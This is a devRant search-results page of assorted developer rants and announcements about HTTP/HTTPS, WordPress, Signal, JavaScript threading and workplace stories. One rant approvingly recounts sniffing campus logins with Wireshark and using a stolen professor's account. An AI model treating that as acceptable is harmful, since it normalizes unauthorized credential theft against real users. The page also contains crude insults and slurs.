Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "http/https"
-
*Now that's what I call a Hacker*
MOTHER OF ALL AUTOMATIONS
This seems a long post. but you will definitely +1 the post after reading this.
xxx: OK, so, our build engineer has left for another company. The dude was literally living inside the terminal. You know, that type of a guy who loves Vim, creates diagrams in Dot and writes wiki-posts in Markdown... If something - anything - requires more than 90 seconds of his time, he writes a script to automate that.
xxx: So we're sitting here, looking through his, uhm, "legacy"
xxx: You're gonna love this
xxx: smack-my-bitch-up.sh - sends a text message "late at work" to his wife (apparently). Automatically picks reasons from an array of strings, randomly. Runs inside a cron-job. The job fires if there are active SSH-sessions on the server after 9pm with his login.
xxx: kumar-asshole.sh - scans the inbox for emails from "Kumar" (a DBA at our clients). Looks for keywords like "help", "trouble", "sorry" etc. If keywords are found - the script SSHes into the clients server and rolls back the staging database to the latest backup. Then sends a reply "no worries mate, be careful next time".
xxx: hangover.sh - another cron-job that is set to specific dates. Sends automated emails like "not feeling well/gonna work from home" etc. Adds a random "reason" from another predefined array of strings. Fires if there are no interactive sessions on the server at 8:45am.
xxx: (and the oscar goes to) fuckingcoffee.sh - this one waits exactly 17 seconds (!), then opens an SSH session to our coffee-machine (we had no frikin idea the coffee machine is on the network, runs linux and has SSHD up and running) and sends some weird gibberish to it. Looks binary. Turns out this thing starts brewing a mid-sized half-caf latte and waits another 24 (!) seconds before pouring it into a cup. The timing is exactly how long it takes to walk to the machine from the dudes desk.
xxx: holy sh*t I'm keeping those
Credit: http://bit.ly/1jcTuTT
The bash scripts weren't bogus, you can find his scripts on the this github URL:
https://github.com/narkoz/...53 -
Hey everyone,
Merry Christmas to everyone who celebrates, happy holidays to everyone, and happy almost-new-year!
Tim and I wanted to reflect on the year devRant has had, and looking back, there are a lot of awesome things that happened in 2018 that we are very thankful for. Here are just a few of the ones that we thought of (this list is not exhaustive and I'm definitley forgetting stuff, so please comment about those!):
- After nearly a year in the making, the completely overhauled devRant web version was launched (https://devrant.com/rants/1255714/...)
- @linuxxx became the first devRant user to hit 100,000++! (https://devrant.com/rants/1157415/...)
- We once again pulled off the greatest April fools joke everrrr (https://devrant.com/rants/1311206/...)
- @trogus started making awesome devComics and http://devcomics.com was launched
- We added a feature to allow rant filtering by post type (https://devrant.com/rants/1354275/...)
- We made it so avatars could have expressions! (https://devrant.com/rants/1563683/...)
- We had a booth at TechDay New York and got to meet some devRant users! (https://devrant.com/rants/1394067/...)
- We made major backend architectural improvements - including spinning up a special high-powered-CPU web server to handle avatar creation and make the creation process much faster (https://devrant.com/rants/1370938/...)
- App stability: mainly Android - we fixed crashes, did a push-notif overhaul, and tried to continue making the apps better and more stable
- A record amount of devRant meetups were held, and we couldn't be more proud about that, and we thank every person who organized one! (just a few: https://devrant.com/rants/1588218/... https://devrant.com/rants/1884724/... https://devrant.com/rants/1683365/... https://devrant.com/rants/1922950/...)
We had a busy year, and despite some things going on for us personally and some setbacks around those, we think this was a very productve year for devRant and that we are going in the right direction. We're continuing to constantly evaluate feedback from members of the community to decide where to take the app next. We're fully committed to improving the devRant community in 2019 and we have a lot of ideas about how we can do that. We're working on some things, but we're not really announcing them yet, so please sit tight for those :) In the meantime, feel free to let us know what you'd like to see improved/added the most as we always like to get updated feedback from the community.
As always, thank you everyone, and thanks for your amazing contributions to the devRant community!
Looking forward to 2019,
- David and Tim26 -
Internet Explorer:
You type a local IP without the protocol.
It doesn't add http automatically.
It doesn't add https automatically.
IT TRIES TO SEARCH IT ON BING
I freaking hate IE13 -
I just started playing around with machine learning in Python today. It's so fucking amazing, man!
All the concepts that come up when you search for tutorials on YouTube (you know, neural networks, SVM, Linear/Logic regression and all that fun stuff) seem overwhelming at first. I must admit, it took me more than 5 hours just to get everything set up the way it should be but, the end result was so satisfying when it finally worked (after ~100 errors).
If any of you guys want to start, I suggest visiting these YouTube channels:
- https://youtube.com/channel/...
- http://youtube.com/playlist/...9 -
Its that time of the morning again where I get nothing done and moan about the past ... thats right its practiseSafeHex's most incompetent co-worker!!!
Today I'd like to tell you the story of "i". Interesting about "I" is that he was actually a colleague of yesterdays nominee "G" (and was present at the "java interface" video call, and agreed with G!): https://devrant.com/rants/1152317/...
"I" was the spearhead of a project to end all projects in that company. It was suppose to be a cross-platform thing but ended up only working for iOS. It was actually quite similar to this: https://jasonette.com/ (so similar i'm convinced G / I were part of this but I can't find their github ID's in it).
To briefly explain the above + what they built ... this is the worst piece of shit you can imagine ... and thats a pretty strong statement looking back at the rest of this series so far!
"I" thought this would solve all of our problems of having to build similar-ish apps for multiple customers by letting us re-use more code / UI across apps. His main solution, was every developers favourite part of writing code. I mean how often do you sit back and say:
"God damn I wish more of this development revolved around passing strings back and forth. Screw autocomplete, enums and typed classes / variables, I want more code / variables inside strings in this library!"
Yes thats right, the main part of this bullshittery was putting your entire app, into JSON, into a string and downloading it over http ... what could possibly go wrong!
Some of my issues were:
- Everything was a string, meaning we had no autocomplete. Every type and property had to be remembered and spelled perfectly.
- Everything was a string so we had no way to cmd + click / ctrl + click something to see somethings definition.
- Everything was a string so any business logic methods had to be remembered, all possible overloaded versions, no hints at param types no nothing.
- There was no specific tooling for any of this, it was literally open up xcode, create a json file and start writing strings.
- We couldn't use any of the native UI builders ... cause strings!
- We couldn't use any of the native UI layout constructs and we had to use these god awful custom layout managers, with a weird CSS feel to them.
What angered me a lot was their insistence that "You can download a new app over http and it will update instantly" ... except you can't because you can't download new business logic only UI. So its a new app, but must do 100% exactly the same thing as before.
His other achievements include:
- Deciding he didn't like apple's viewController and navigationBar classes and built his own, which was great when iOS 7 was released (changed the UI to allow drawing under the status bar) and we had no access to any of apples new code or methods, meaning everything had to be re-built from scratch.
- On my first week, my manager noticed he fucked up the login error handling on the app I was taking over. He noticed this as I was about to leave for the evening. I stayed so we could call him (he was in an earlier timezone). Rather than deal with his fucked up, he convinced the manager it would be a "great learning experience" for me to do it ... and stay in late ... while he goes home early.
- He once argued with me in front of the CEO, that his frankenstein cross-platform stuff was the right choice and that my way of using apples storyboards (and well thought out code) wasn't appropriate. So I challenged him to prove it, we got 2 clients who needed similar apps, we each did it our own way. He went 8 man weeks over, I came in 2 days under and his got slated in the app store for poor performance / issues. #result.
But rather than let it die he practically sucked off the CEO to let him improve the cross platform tooling instead.
... in that office you couldn't swing a cat without hitting a retard.
Having had to spend a lot more time working with him and more closely than most of the other nominees, at a minimum "I" is on the top of my list for needing a good punch in the face. Not for being an idiot (which he is), not for ruining so much (which he did), but for just being such an arrogant bastard about it all, despite constant failure.
Will "I" make it to most incompetent? Theres some pretty stiff competition so far
Tune in later for more practiceSafeHex's most incompetent co-worker!!!7 -
Screaming at harddrives increases disk latency, as demonstrated in 2008 by a SUN-engineer.
https://web.archive.org/web/...
https://youtu.be/tDacjrSCeq44 -
At the end of our first podcast (https://devrant.io/podcasts/...) we gave a hint about the featured guest on our second episode. Now, it's time to announce this guest!
For the next episode of The devRant Podcast, we're fortunate enough to welcome David Heinemeier Hansson, also commonly known as DHH!! (http://david.heinemeierhansson.com/) David is the creator of Ruby on Rails and founder/CTO of Basecamp/37signals (project management tool), and a best-selling author know for titles like "Rework." He also drives race cars. We're extremely excited that we'll have the change to interview him as our second featured guest.
Like last time, it's time to take questions from the devRant community! If you have a question you'd like us to ask David, please add it as a comment on this rant or you can email me (david@devrant.io). Thanks everyone!6 -
"We don't need to invest in security - noone is going to hack us anyway" == "We don't need a fire department in our city - fire is not going to start here anyway"
We don't need to invest in security - everything is public anyway" == "We don't need a fire department in our city - our buildings are made out of straws anyway"
-- my thoughts after seing a line in client's spec: "sensitive data is transferred via a secure tcp channel (https) and all the public data is transferred via an unencrypted tcp (http) channel"3 -
https with resources that use http is like leaning in dramatically for a kiss then sneezing on her.
¯\_(ツ)_/¯3 -
Hey everyone,
Our live stream announcement and Q&A will be going live in less than 30 mins (9pm EDT)!
The event is here: https://youtu.be/Vk7TIKadYHk
We will be taking questions on the YouTube chat, feel free to ask whatever you want!
Thanks to all who tune in, hope you enjoy!
EDIT: big thanks to everyone who joined us and participated! The replay is available at the YouTube link above, and you can check out devDucks in the devRant swag store (https://swag.devrant.io) or the page we set up at http://devducks.com20 -
I feel awkward when my boss is creeping behind. Of course, I can switch the screen in a hurry, but such behavior is suspicious, and sometimes I don’t notice him. So, in order to switch the screen without being suspected, I create a system that automatically recognizes that he is approaching to me and hides the screen.
https://github.com/Hironsan/...
Source: http://ahogrammer.com/2016/11/...6 -
So today (or a day ago or whatever), Pavel Durov attacked Signal by saying that he wouldn't be surprised if a backdoor would be discovered in Signal because it's partially funded by the US government (or, some part of the us govt).
Let's break down why this is utter bullshit.
First, he wouldn't be surprised if a backdoor would be discovered 'within 5 years from now'.
- Teeny tiny little detail: THE FUCKING APP IS OPEN SOURCE. So yeah sure, go look through the code! Good idea! You might actually learn something from it as your own crypto seems to be broken! (for the record, I never said anything about telegram not being open source as it is)
sources:
http://cryptofails.com/post/...
http://theregister.co.uk/2015/11/...
https://security.stackexchange.com/...
- The server side code is closed (of signal and telegram both). Well, if your app is open source, enrolled with one of the strongest cryptographic protocols in the world and has been audited, then even if the server gets compromised, the hackers are still nowhere.
- Metadata. Signal saves the following and ONLY the following: timestamp of registration, timestamp of the last connection with the server (both rounded to the day so not on the second), your phone number and your contact details (if you authorize it) (only phone numbers) in HASHED (BCrypt I thought?) format.
There have been multiple telegram metadata leaks and it's pretty known that it saves way more than neccesary.
So, before you start judging an app which is open, uses one of the best crypto protocols in the world while you use your own homegrown horribly insecure protocol AND actually tries its best to save the least possible, maybe try to fix your own shit!
*gets ready for heavy criticism*20 -
For my fellow javascript devs:
var floored = 12.68 | 0;
Is much faster than:
var floored = Math.floor(12.68);
And in both cases floored === 12
#JustJavascriptThings ¯\_(ツ)_/¯
Source: http://stackoverflow.com/questions/...
Performance test: https://measurethat.net/Benchmarks/...5 -
So apparently two "senior" "laravel-engineers" spent a total billed 35 hours trying to figure out a "critical bug" which "doesn't happen locally".
I went to the dev-console, saw it is generating http urls (fronted by cloudflare https, running on http server-side) and fixed that in maybe ~15 minutes, fucking morons.9 -
I still miss my college days. Our crappy IT Dept restricted internet usage on campus. Each student used to get 10 GB of internet data and they used Cyberoam for login (without HTTPS). 10 GB was so less (at least for me).
Now, thanks to CS50, I learned that HTTP was not secure and somehow you can access login credentials. I spent a night figuring things out and then bam!! Wireshark!!!!
I went to the Central Library and connected using Wireshark. Within a matter of minutes, I got more than 30 user ids and passwords. One of them belonged to a Professor. And guess what, it had unlimited data usage with multiple logins. I felt like I was a millionaire. On my farewell, I calculated how much data I used. It was in TBs.
Lesson: Always secure your URLs.5 -
I hate Wordpress. I hate Wordpress. I hate Wordpress.
Wordpress can take a big shit on itself and crawl into a deep dark hole far away from all that is good.
Who even uses Wordpress? Bloggers? Come on, let’s be honest, they’re using more intuitive sites like weebly, wix, and square space. So WHAT is Wordpress for? I’ll tell you, it’s just to FUCKING TORTURE PEOPLE.
So, being the “techy guy” of the family, a relative contacts me asking for some help with their website because they need to install an SSL certificate but they don’t know how to. I tell them I’d gladly do it because, sure, they’re family and how long can it possibly take to install a certificate? I’ve done it before!
Well, I get to work and log into the sluggish Wordpress dashboard and try to use a plugin that would issue a LetsEncrypt certificate because they are free and just as good as any other SSL. But one plugin after the next I keep getting errors about how my hosting wouldn’t allow it.
So I contact GoDaddy (don’t get me fucking started) and ask them about the issue. The guy tells me it’s “policy” to only be able to use GoDaddy’s certificates. How much do they cost? Oh, how about $100 a year?! Fuck you.
I figured out the only way to escape this hell was to ask them to open an economy Linux hosting account with cPanel on GoDaddy (the site was formerly hosted on a “Managed Wordpress” account which is just bullshit for not wanting to give you any control over your own goddamn content). So now I have to deal with migrating the site.
GoDaddy representative tells me that it should only take 20 minutes for me to do this (I’ve already spent way too much time on this but whatever) so I go forward with the new account. I decide I should migrate the site by exporting a backup and manually placing everything on the new server. Doesn’t it end up taking an entire hour to back up a 200MB site because GoDaddy throttled the processing speed?!
So, it’s another hour later and I’ve installed all the databases and carried over all the files. At this point, I’m really at the end of my rope and can’t wait to install the certificate and be done with this fuckery.
I install the certificate and finally get ready to be on my way, but then I see it. A warning. A warning from my browser telling me the site is only partially secure. It turns out the certificate was properly installed but whoever initially made the site HARDCODED ALL THE LINKS to images, websites, and style sheets to be http instead of https.
I’m gonna explode.
I swear, I’m gonna fucking explode.
After a total of 5 hours of work, I finally get the site secure by using search and replace on every fucking file.
Wordpress can go suck a big one. Actually, Wordpress can go suck the largest fuckin one in existence and choke on it.
TL;DR I agree to install an SSL certificate but end up with much more work than I bargained.38 -
THERE IS ACTUALLY A REPOSITORY ON HOW TO ANNOY DEVELOPERS.
WOW. JUST WOW.
https://github.com/omidfi/...
http://howtoannoyawebdeveloper.com5 -
! a Rant
Dear fellow devRanters!
I have an announcement to make. After we shared Programmer’s Music (www.programmersmusic.com) on devRant, we had so many awesome user started using our service and they still do. We love you all for that and thank you for you continuous support and use.
Now that our team has become more focused and productive, we took upon a new problem to tackle a few months back. The problem we chose is about increasing email productivity and ability to comprehend knowledge hidden in emails in a more effective way. We are excited to introduce ‘Altmail’! (https://www.altmail.in)
We believe that there’s a hidden treasure in your inbox waiting to be explored. All those newsletters and blog updates, all those deals, all those Medium digests and LinkedIn alerts, contain keys to becoming a better version of yourself. So we have made it Altmail’s mission to help you spend less time organising and more time acquiring knowledge. Altmail transforms your cluttered inbox into the source of knowledge, automagically.
We are currently in private beta and have limited invites left, to be specific 33 out of 100. Please check it out here - http://at.altmail.in/devRant!
We are looking forward to your honest feedback! :)
Thanks a ton!
Cheers!21 -
Alright, this is a new one to me, and wow am I blown away.
Working on upgrading an API that I did not build. Getting things running well enough and then an endpoint (which runs well enough in the tests) returns a `418 I'm a teapot`
Yeah, you read that right "I'm a (motherfucking) teapot"
The description is that...
"refuses to make coffee because it is a teapot"
It was an April fools joke in the beginning.
I couldn't return that error if I tried!
This shit is bizarre.
For your reading pleasure:
https://developer.mozilla.org/en-US...3 -
Okay, story time.
Back during 2016, I decided to do a little experiment to test the viability of multithreading in a JavaScript server stack, and I'm not talking about the Node.js way of queuing I/O on background threads, or about WebWorkers that box and convert your arguments to JSON and back during a simple call across two JS contexts.
I'm talking about JavaScript code running concurrently on all cores. I'm talking about replacing the god-awful single-threaded event loop of ECMAScript – the biggest bottleneck in software history – with an honest-to-god, lock-free thread-pool scheduler that executes JS code in parallel, on all cores.
I'm talking about concurrent access to shared mutable state – a big, rightfully-hated mess when done badly – in JavaScript.
This rant is about the many mistakes I made at the time, specifically the biggest – but not the first – of which: publishing some preliminary results very early on.
Every time I showed my work to a JavaScript developer, I'd get negative feedback. Like, unjustified hatred and immediate denial, or outright rejection of the entire concept. Some were even adamantly trying to discourage me from this project.
So I posted a sarcastic question to the Software Engineering Stack Exchange, which was originally worded differently to reflect my frustration, but was later edited by mods to be more serious.
You can see the responses for yourself here: https://goo.gl/poHKpK
Most of the serious answers were along the lines of "multithreading is hard". The top voted response started with this statement: "1) Multithreading is extremely hard, and unfortunately the way you've presented this idea so far implies you're severely underestimating how hard it is."
While I'll admit that my presentation was initially lacking, I later made an entire page to explain the synchronisation mechanism in place, and you can read more about it here, if you're interested:
http://nexusjs.com/architecture/
But what really shocked me was that I had never understood the mindset that all the naysayers adopted until I read that response.
Because the bottom-line of that entire response is an argument: an argument against change.
The average JavaScript developer doesn't want a multithreaded server platform for JavaScript because it means a change of the status quo.
And this is exactly why I started this project. I wanted a highly performant JavaScript platform for servers that's more suitable for real-time applications like transcoding, video streaming, and machine learning.
Nexus does not and will not hold your hand. It will not repeat Node's mistakes and give you nice ways to shoot yourself in the foot later, like `process.on('uncaughtException', ...)` for a catch-all global error handling solution.
No, an uncaught exception will be dealt with like any other self-respecting language: by not ignoring the problem and pretending it doesn't exist. If you write bad code, your program will crash, and you can't rectify a bug in your code by ignoring its presence entirely and using duct tape to scrape something together.
Back on the topic of multithreading, though. Multithreading is known to be hard, that's true. But how do you deal with a difficult solution? You simplify it and break it down, not just disregard it completely; because multithreading has its great advantages, too.
Like, how about we talk performance?
How about distributed algorithms that don't waste 40% of their computing power on agent communication and pointless overhead (like the serialisation/deserialisation of messages across the execution boundary for every single call)?
How about vertical scaling without forking the entire address space (and thus multiplying your application's memory consumption by the number of cores you wish to use)?
How about utilising logical CPUs to the fullest extent, and allowing them to execute JavaScript? Something that isn't even possible with the current model implemented by Node?
Some will say that the performance gains aren't worth the risk. That the possibility of race conditions and deadlocks aren't worth it.
That's the point of cooperative multithreading. It is a way to smartly work around these issues.
If you use promises, they will execute in parallel, to the best of the scheduler's abilities, and if you chain them then they will run consecutively as planned according to their dependency graph.
If your code doesn't access global variables or shared closure variables, or your promises only deal with their provided inputs without side-effects, then no contention will *ever* occur.
If you only read and never modify globals, no contention will ever occur.
Are you seeing the same trend I'm seeing?
Good JavaScript programming practices miraculously coincide with the best practices of thread-safety.
When someone says we shouldn't use multithreading because it's hard, do you know what I like to say to that?
"To multithread, you need a pair."18 -
We are on a roll here people (side note, if You are joining the site, thank you but if you are using disposable email accounts at least wait for the verification code to arrive to said account):
So our most well know and belowed CMS that brings lots of love and feels to those that have to (still) deal with it, had some interesting going on:
Oh Joy! "Backdoor in Captcha Plugin Affects 300K WordPress Sites", well arent You a really naughty little boy, eh?
https://wordfence.com/blog/2017/...
Remember that "little" miner thingy that some users here has thought about using for their site? Even Yours truly that does make use of Ads Networks (fuck you bandwidth is not free) even I have fully condenmed the Miner type ads for alot of reasons, like your computer being used as a literal node for DDoSing, well... how about your "Antivirus" Android phone apps being literally loaded with miner trojans too?
https://securelist.com/jack-of-all-...
"When You literally stopped giving any resembles of a fuck what people think about Your massive conglomerate since You still literally dominate the market since alot of people give zero fucks of how Orwellian We are becoming at neck-breaking speed" aka Google doesnt want other webbrowsers to get into market, Its happy with having MemeFox as its competitor:
https://theregister.co.uk/2017/12/...
Talking about MemeFox fucking up again:
https://theregister.co.uk/2017/12/...
And of course here at Legion Front we cant make finish a report without our shitting at Amazon news report:
"French gov files €10m complaint: Claims Amazon abused dominance
Probe found unfair contracts for sellers"
More News at:
https://legionfront.me/page/news
And for what you may actually came and not me reporting stuff at Legion's Orwell Hour News™ ... the free games, right?:
Oxenfree is free in GoG, its a good game, I played like 2 months after its release and I think I heard they wanted to make a Live Action movie or some sort of thing after it:
https://www.gog.com/game/oxenfree
Kingdom Classic is also free:
http://store.steampowered.com/app/...
Close Order Steam Key: HWRMI-2V3PQ-ZQX8B
More Free Keys at:
https://legionfront.me/ccgr4 -
thanks hostgator…
say my website is x.com
https://x.com shows the index.php file
https://www.x.com shows the index.php
http://www.x.com shows the index.php
but then…
http://x.com shows FUCKING INDEX.JS
I DON'T WANT TO SPEND MY TIME CONFIGURING THIS SHIT. SUCK A COCK HOSTGATOR11 -
Recap: https://www.devrant.io/rants/878300
I was out Thursday at the Hospital. I'm what the doctors would call "Ill as fuck"
So, Friday I’m back in the office to the usual: "How was that appointment?"
I know people mean well when they ask this. So, I do the polite thing and tell them it went as well as it could.
Realistically it does't matter how well it went... They haven't cured Crohn's because I showed up to the appointment. They know I'm fucked already.
But, push it down, add it to the future aneurism.
I had to go through the usual resignation meetings with managers:
"We"re fucked now you're going"
"yep"
"we need to get a handle on how fucked"
"already done that for you, here"s a trello board, very fucked."
"we need to put a plan together to drop all the junior devs in the shit with the work you’ve been doing"
"You need about 4 devs, please refer to the previous trello board for your plan"
Meanwhile, me and Morpheus are in constant communication because all of this is like a Shakespearean comedy.
So, I overhear a conversation between a Junior Dev and the Solution Architect.
[SA] took over the project because he knows better than two tried and tested senior devs -_- (fuckwit).
JD: "It took me one and a half days to build it out"
SA: "Yeah, it must have taken me twice as long... It must be a problem with the project, you should just be able to check it out and run it."
JD: "I know, it has to be wrong"
All of this is about Morpheus' work of art, of an Ionic 3 hybrid app.
I fumed quietly at my desk because I've been ordered by the Stazi to be hands off.
Since Morpheus and me were pulled from the project [JD] and [JD2] were dropped into it to get it over the line.
It"s unfortunate and I was clear and honest with my advice to them: I personally would not take over the project because I"d be way out of my depth... Oh, and the App works, so uh, there's no work to do.
They have been constantly at our desks. Asking fuckdiculous questions about how to perform basic tasks. So they can get Morpheus" frigging masterpiece to the user.
It"s like watching that touch up of jesus that got borked by an amateur. Shit I have google, it's like watching this happen: http://ti.me/NnNSAb
[JD] came to me Friday evening.
"I can’t get this to build to iOS or install on [Test Analyst]'s phone."
Me: "No worries brother, where are you stuck right now?"
[JD] describes the first steps with clear indication he hasn't googled his problem.
Life lesson: http://lmgtfy.com/?q=lmgtfy
Que an hour of me showing [JD] how to build an Ion3 project for iOS. Fuck it, your man's in a bind and he"s asked politely for help. I can show him quicker than he can read 3 sets of docos.
I took him through 'ionic cordova build ios', the archive and release processes in XCode 9, then the apk bundling process for droid. Finally we have an MAM so the upload process for that too.
All the while cleaning up his AppIDs, Profiles, deployment attempts.
Damn they were a mess.
I did this with a smile on my face, not because I could say "I told you so"... But. because when any developer asks you how to do something. If you know how to do it, you should always be happy to learn them some new tricks!
Dude's alright, he's been dropped in the shit. Now I know how badly so I'll help him learn things that are useful to his role, but aren't project specific.
As a plausi-senior dev (I'll tell you about that later); it's my job to make sure my team have what they need to go home smiling!
I’m not a hateful fucker, the guy asked me an honest question so I am happy to give him the honest answer.
I took him through it a few times and explained a few best practices. Most were how to do his AppID and ProvProfile set up. Good lad, took it all on board.
However! In his frustration, he pointed the finger at Morpheus' "David" (ref: Michelangelo).
He miraculously morphed into a shiny colourful parrot and fed me SA's line:
"you should just be able to build from a clean clone"
My response was calm and clear:
"You can, it took me 20 minutes on Thursday evening. I was bored and curios, so I wanted to validate Morpheus' work. Here it is on my iOS device and my Android device. It would have taken me 5 if my laptop wasn’t so horrifically out of date."
I validated Morpheus' work so I have evidence, I trust that brilliant bastard.
I just need to be able to prove it's good.
[JD] took this on board.
Maybe listening to two tried and trusted senior devs is better than listening to a headstrong Solution Architect.
When JD left for the weekend I was working a late one (https://www.devrant.io/rants/874765).
His sign off was beautiful.
"I think I can happily admit defeat on this one, it can wait until Monday."
To which I replied: "no worries brother, if you need a hand give me a shout."
Rule 1: Don't be a cunt.
Rule 2: If someone needs help and you can give it: Give it!
Rule 3: Don't interrupt James' cigarette time.
Rule 4: goto Rule 3.rant day 3 jct resigns crohns resignation solution architect wk71 invisible illness fuckwit illness junior developer4 -
You know what really pisses me off about the dev community is the circle jerk that ensues when someone bashes something they have no experience in. Take yesterday's React bash on Reddit and DevRant. Thomas Fuchs compared React and JSX to the intermingling of HTML CSS and JS of 15 years ago. If you knew anything about React or spent 1 hour learning what it's about you would immediately know why that isn't true but no, a giant circle jerk ensued comparing it to PHP! I'm sorry but HOW can you compare a pure JS view library that is renderable by the browser, to a full fledged server side language?? Not to mention the React approach uses a completely different programming paradigm of functional programming.
When I first saw React and Redux I realized what this is all really about, a shift in the paradigms of programming. React + Redux is the first time that functional programming has entered mainstream. We've had functional programming available to us via Haskell and more recently Clojure for a while now but it was never very obvious how powerful functional programming could be outside of the niche that used it for more analytical type tools. Now we have things like hot reloading (https://youtube.com/watch/...) and state playback (https://youtube.com/watch/... skip to ~3min to watch the magic) thanks to immutable state.
Before you decide that React is just another flavor of the month library I encourage you to learn about the advantages that functional programming provides (https://medium.com/@cscalfani/...) and checkout Elm (http://elm-lang.org/) as well. The nice thing about React + Redux is that it gives us a way to start programming functionally, without having to learn ML style syntax like Elm and ClojureScript. Keep in mind, when Object Oriented Programming was becoming popular it was widely controversial as well and look at all it has done for us.6 -
First lecture of computer networks. Let's shove all of these abbreviations with their meaning, and possibly a associated port number in one 1.5 hour lecture:
HTTP, HTTPS, FTP, FTPS, SFTP, TCP, IP, UDP, ISP, DSL, DNS, LAN, WLAN, WDM, P2P, TELNET, PGP, TLS, SSL, SSH, MIME, SMTP, POP3, IMAP, IANA, DHT, RTT, DHCP
I really feel sorry for students who didn't have previous knowledge about this stuff..5 -
A few days ago a friend of mine asked me to teach him to code. When I wanted to know which language he'd like to learn, he hesitantly replied "https".
Then I explained, this was a data transfer protocol. His next idea was "http". 🙄
Guess who will learn Python8 -
Ohai, a few devRanters (including me) have been working on planning a Dutch devRant meetup once again.
Although we're quite late with the "announcement", hereby!
It'll happen upcoming Saturday in Nijmegen (at least one German living person is coming as well and some people wanted to see it anyways so that's why).
Here's a collab edit thingy where you can put your name if you're coming!:
http://collabedit.com/wmj25 (yes, no https, I'm aware, I didn't chose this one but for now it works)
I'll mention some dutchies in the comments :)
Looking forward to upcoming Saturday :D43 -
I should not have looked at this really interesting Chrome extension.
https://chrome.google.com/webstore/...
It tries to prevent phishing links from working by adding attributes to change the behaviour of the browser.
HOW DOES THIS WORK?
Just one simple line:
$('[target="_blank"]').attr("rel", "noopener noreferrer");
But why is this extension so bloated?
It loads the full jQuery library. For an attribute change!
I'd like to refer to this site for further investigations: http://youmightnotneedjquery.com//...
http://youmightnotneedjquery.com//...3 -
Okay guys, this is it!
Today was my final day at my current employer. I am on vacation next week, and will return to my previous employer on January the 2nd.
So I am going back to full time C/C++ coding on Linux. My machines will, once again, all have Gentoo Linux on them, while the servers run Debian. (Or Devuan if I can help it.)
----------------------------------------------------------------
So what have I learned in my 15 months stint as a C++ Qt5 developer on Windows 10 using Visual Studio 2017?
1. VS2017 is the best ever.
Although I am a Linux guy, I have owned all Visual C++/Studio versions since Visual C++ 6 (1999) - if only to use for cross-platform projects in a Windows VM.
2. I love Qt5, even on Windows!
And QtDesigner is a far better tool than I thought. On Linux I rarely had to design GUIs, so I was happily surprised.
3. GUI apps are always inferior to CLI.
Whenever a collegue of mine and me had worked on the same parts in the same libraries, and hit the inevitable merge conflict resolving session, we played a game: Who would push first? Him, with TortoiseGit and BeyondCompare? Or me, with MinTTY and kdiff3?
Surprise! I always won! 😁
4. Only shortly into Application Development for Windows with Visual Studio, I started to miss the fun it is to code on Linux for Linux.
No matter how much I like VS2017, I really miss Code::Blocks!
5. Big software suites (2,792 files) are interesting, but I prefer libraries and frameworks to work on.
----------------------------------------------------------------
For future reference, I'll answer a possible question I may have in the future about Windows 10: What did I use to mod/pimp it?
1. 7+ Taskbar Tweaker
https://rammichael.com/7-taskbar-tw...
2. AeroGlass
http://www.glass8.eu/
3. Classic Start (Now: Open-Shell-Menu)
https://github.com/Open-Shell/...
4. f.lux
https://justgetflux.com/
5. ImDisk
https://sourceforge.net/projects/...
6. Kate
Enhanced text editor I like a lot more than notepad++. Aaaand it has a "vim-mode". 👍
https://kate-editor.org/
7. kdiff3
Three way diff viewer, that can resolve most merge conflicts on its own. Its keyboard shortcuts (ctrl-1|2|3 ; ctrl-PgDn) let you fly through your files.
http://kdiff3.sourceforge.net/
8. Link Shell Extensions
Support hard links, symbolic links, junctions and much more right from the explorer via right-click-menu.
http://schinagl.priv.at/nt/...
9. Rainmeter
Neither as beautiful as Conky, nor as easy to configure or flexible. But it does its job.
https://www.rainmeter.net/
10 WinAeroTweaker
https://winaero.com/comment.php/...
Of course this wasn't everything. I also pimped Visual Studio quite heavily. Sam question from my future self: What did I do?
1 AStyle Extension
https://marketplace.visualstudio.com/...
2 Better Comments
Simple patche to make different comment styles look different. Like obsolete ones being showed striked through, or important ones in bold red and such stuff.
https://marketplace.visualstudio.com/...
3 CodeMaid
Open Source AddOn to clean up source code. Supports C#, C++, F#, VB, PHP, PowerShell, R, JSON, XAML, XML, ASP, HTML, CSS, LESS, SCSS, JavaScript and TypeScript.
http://www.codemaid.net/
4 Atomineer Pro Documentation
Alright, it is commercial. But there is not another tool that can keep doxygen style comments updated. Without this, you have to do it by hand.
https://www.atomineerutils.com/
5 Highlight all occurrences of selected word++
Select a word, and all similar get highlighted. VS could do this on its own, but is restricted to keywords.
https://marketplace.visualstudio.com/...
6 Hot Commands for Visual Studio
https://marketplace.visualstudio.com/...
7 Viasfora
This ingenious invention colorizes brackets (aka "Rainbow brackets") and makes their inner space visible on demand. Very useful if you have to deal with complex flows.
https://viasfora.com/
8 VSColorOutput
Come on! 2018 and Visual Studio still outputs monochromatically?
http://mike-ward.net/vscoloroutput/
That's it, folks.
----------------------------------------------------------------
No matter how much fun it will be to do full time Linux C/C++ coding, and reverse engineering of WORM file systems and proprietary containers and databases, the thing I am most looking forward to is quite mundane: I can do what the fuck I want!
Being stuck in a project? No problem, any of my own projects is just a 'git clone' away. (Or fetch/pull more likely... 😜)
Here I am leaving a place where gitlab.com, github.com and sourceforge.net are blocked.
But I will also miss my collegues here. I know it.
Well, part of the game I guess?7 -
Trying to learn some golang after a break.
Made http / https transparent proxy for personal project.
Mind: You need to add configuration file with domains you allow traffic and block everything else using list of regex.
Me: Ok I can do it, 4 hours later ok done
Mind: Why not make it differently by making list of url you can block and test this shit on fucking ads and stop using adblock that downloads content.
Me: ok that will be handy I can watch websites faster and drop traffic I don’t want to.
Funny fact, it works I broke analytics, logging, quantum shit fucks and even youtube plays ok.
Go is awesome for networking stuff lol.12 -
"A Single Line of Computer Code Put Thousands of Innocent Turks in Jail"
I'll leave the title as it was, but people were hunted down just for having been once logged by a tracking pixel inside a messaging app.
Simply terrifying, I hold that off for a while, since it sounded like the usual fakes, but it seems its not, as more and more keep confirming it.
"The government eventually exonerated 11,480 of the wrongly accused, but some had already spent months in prison, and reportedly some even committed suicide."
"Elif finished dressing her youngest and watched police search her family's home before they took her into custody — for using a messaging app the government deems seditious.
She knew the arrest was coming. She'd already lost her job, because traces of the app known as Bylock were found on her phone"
"The regime relies on logs from the country's ISPs to identify users of Bylock, fingerprinting them on the basis of their communications with Bylock's servers. These communications can be triggered without using Bylock, though: Bylock's tracking pixel was used for analytics for pop-up ads and in at least eight apps."
